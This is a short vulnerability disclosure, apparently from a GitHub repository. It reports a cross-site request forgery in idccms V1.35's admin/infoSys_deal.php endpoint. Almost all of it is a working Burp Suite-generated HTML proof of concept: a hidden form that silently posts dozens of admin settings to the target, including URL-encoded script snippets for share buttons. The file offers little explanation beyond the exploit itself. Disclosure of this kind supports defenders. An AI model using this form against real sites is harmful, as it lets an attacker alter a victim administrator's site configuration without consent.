Skip to content

Latest commit

 

History

History
76 lines (73 loc) · 6.74 KB

csrf.md

File metadata and controls

76 lines (73 loc) · 6.74 KB
Raw

target:http://idccms.com/ version: V1.35

idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/infoSys_deal.php?mudi=deal

POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:80/admin/infoSys_deal.php?mudi=deal" method="POST">
      <input type="hidden" name="dataType" value="" />
			<input type="hidden" name="dataTypeCN" value="%E6%96%87%E7%AB%A0%E5%8F%82%E6%95%B0%E8%AE%BE%E7%BD%AE" />
			<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2FinfoSys.php%3Fmudi%3Dmanage%26dataMode%3D%26dataModeStr%3D%26dataType%3D%26dataTypeCN%3D%25E6%2596%2587%25E7%25AB%25A0%25E5%258F%2582%25E6%2595%25B0%25E8%25AE%25BE%25E7%25BD%25AE%26dataType2%3D%26dataID%3D0%26menuID%3D442" />
			<input type="hidden" name="defIsAudit" value="1" />
			<input type="hidden" name="defIsNew" value="1" />
			<input type="hidden" name="defTopAddiID" value="0" />
			<input type="hidden" name="defAddiID" value="0" />
			<input type="hidden" name="defVoteMode" value="1" />
			<input type="hidden" name="defMarkNews" value="1" />
			<input type="hidden" name="defIsReply" value="1" />
			<input type="hidden" name="defReadNum1" value="50" />
			<input type="hidden" name="defReadNum2" value="150" />
			<input type="hidden" name="defScore1" value="0" />
			<input type="hidden" name="defScore2" value="0" />
			<input type="hidden" name="defScore3" value="0" />
			<input type="hidden" name="defCutScore1" value="0" />
			<input type="hidden" name="defCutScore2" value="0" />
			<input type="hidden" name="defCutScore3" value="0" />
			<input type="hidden" name="defIsEnc" value="0" />
			<input type="hidden" name="tabID" value="1" />
			<input type="hidden" name="maxNewsNum" value="21" />
			<input type="hidden" name="tabMaxNum" value="10000" />
			<input type="hidden" name="tabCheckMin" value="0" />
			<input type="hidden" name="moreArea%5B%5D" value="%7Ctemplate%7C" />
			<input type="hidden" name="moreArea%5B%5D" value="%7CtopicID%7C" />
			<input type="hidden" name="is360meta" value="1" />
			<input type="hidden" name="isContentKey" value="1" />
			<input type="hidden" name="isTime" value="1" />
			<input type="hidden" name="isWriter" value="1" />
			<input type="hidden" name="isSource" value="1" />
			<input type="hidden" name="isReadNum" value="1" />
			<input type="hidden" name="isReplyNum" value="1" />
			<input type="hidden" name="oneReadNum" value="0" />
			<input type="hidden" name="readNum1" value="1" />
			<input type="hidden" name="readNum2" value="1" />
			<input type="hidden" name="copyBtnName" value="%E7%82%B9%E5%87%BB%E8%AF%A5%E6%8C%89%E9%92%AE%EF%BC%8C%E5%A4%8D%E5%88%B6%E4%B8%8A%E9%9D%A2%E5%86%85%E5%AE%B9" />
			<input type="hidden" name="fileTitle" value="%E9%99%84%E4%BB%B6%E4%B8%8B%E8%BD%BD" />
			<input type="hidden" name="fileStyle" value="0" />
			<input type="hidden" name="isHideFilePath" value="0" />
			<input type="hidden" name="hiddenContent1" value="" />
			<input type="hidden" name="hiddenContent2" value="" />
			<input type="hidden" name="isNewsVote" value="1" />
			<input type="hidden" name="newsVoteSecond" value="0" />
			<input type="hidden" name="newsVoteCode" value="%3Cdiv+class%3D%22bdlikebutton%22%3E%3C%2Fdiv%3E%0D%0A%3Cscript+id%3D%22bdlike_shell%22%3E%3C%2Fscript%3E%0D%0A%3Cscript%3E%0D%0Avar+bdShare_config+%3D+%7B%0D%0A%09%22type%22%3A%22large%22%2C%0D%0A%09%22color%22%3A%22blue%22%2C%0D%0A%09%22uid%22%3A%220%22%2C%0D%0A%09%22likeText%22%3A%22%E8%AF%A5%E6%96%87%E7%AB%A0%E4%B8%8D%E9%94%99%EF%BC%8C%E8%B0%A2%E8%B0%A2%E5%88%86%E4%BA%AB%22%2C%0D%0A%09%22likedText%22%3A%22%E8%B0%A2%E8%B0%A2%E6%94%AF%E6%8C%81%EF%BC%81%22%2C%0D%0A%09%22share%22%3A%22yes%22%0D%0A%7D%3B%0D%0Adocument.getElementById%28%22bdlike_shell%22%29.src%3D%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Flike_shell.js%3Ft%3D%22+%2B+Math.ceil%28new+Date%28%29%2F3600000%29%3B%0D%0A%3C%2Fscript%3E" />
			<input type="hidden" name="prevAndNext" value="1" />
			<input type="hidden" name="isMarkNews" value="1" />
			<input type="hidden" name="isSaveMarkNewsId" value="1" />
			<input type="hidden" name="isNewsReply" value="1" />
			<input type="hidden" name="newsReplyNum" value="20" />
			<input type="hidden" name="newsReplySecond" value="10" />
			<input type="hidden" name="newsReplyAudit" value="1" />
			<input type="hidden" name="newsReplyMaxLen" value="500" />
			<input type="hidden" name="newsReplyName" value="%E7%AE%A1%E7%90%86%E5%91%98%E5%9B%9E%E5%A4%8D" />
			<input type="hidden" name="isShareNews" value="1" />
			<input type="hidden" name="shareNewsCode" value="%3Cdiv+class%3D%22bdsharebuttonbox%22%3E%3Ca+href%3D%22%23%22+class%3D%22bds_more%22+data-cmd%3D%22more%22%3E%E5%88%86%E4%BA%AB%E5%88%B0%EF%BC%9A%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_weixin%22+data-cmd%3D%22weixin%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E5%BE%AE%E4%BF%A1%22%3E%E5%BE%AE%E4%BF%A1%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_tsina%22+data-cmd%3D%22tsina%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A%22%3E%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_tqq%22+data-cmd%3D%22tqq%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E8%85%BE%E8%AE%AF%E5%BE%AE%E5%8D%9A%22%3E%E8%85%BE%E8%AE%AF%E5%BE%AE%E5%8D%9A%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_qzone%22+data-cmd%3D%22qzone%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0QQ%E7%A9%BA%E9%97%B4%22%3EQQ%E7%A9%BA%E9%97%B4%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_tqf%22+data-cmd%3D%22tqf%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E8%85%BE%E8%AE%AF%E6%9C%8B%E5%8F%8B%22%3E%E8%85%BE%E8%AE%AF%E6%9C%8B%E5%8F%8B%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_bdhome%22+data-cmd%3D%22bdhome%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E7%99%BE%E5%BA%A6%E6%96%B0%E9%A6%96%E9%A1%B5%22%3E%E7%99%BE%E5%BA%A6%E6%96%B0%E9%A6%96%E9%A1%B5%3C%2Fa%3E%3C%2Fdiv%3E%0D%0A%3Cscript%3Ewindow._bd_share_config%3D%7B%22common%22%3A%7B%22bdSnsKey%22%3A%7B%7D%2C%22bdText%22%3A%22%22%2C%22bdMini%22%3A%222%22%2C%22bdMiniList%22%3Afalse%2C%22bdPic%22%3A%22%22%2C%22bdStyle%22%3A%220%22%2C%22bdSize%22%3A%2216%22%7D%2C%22share%22%3A%7B%22bdSize%22%3A16%7D%7D%3Bwith%28document%290%5B%28getElementsByTagName%28%27head%27%29%5B0%5D%7C%7Cbody%29.appendChild%28createElement%28%27script%27%29%29.src%3D%27http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fapi%2Fjs%2Fshare.js%3Fv%3D89860593.js%3Fcdnversion%3D%27%2B%7E%28-new+Date%28%29%2F36e5%29%5D%3B%3C%2Fscript%3E" />
			<input type="hidden" name="authState" value="false" />
			<input type="hidden" name="x" value="56" />
			<input type="hidden" name="y" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>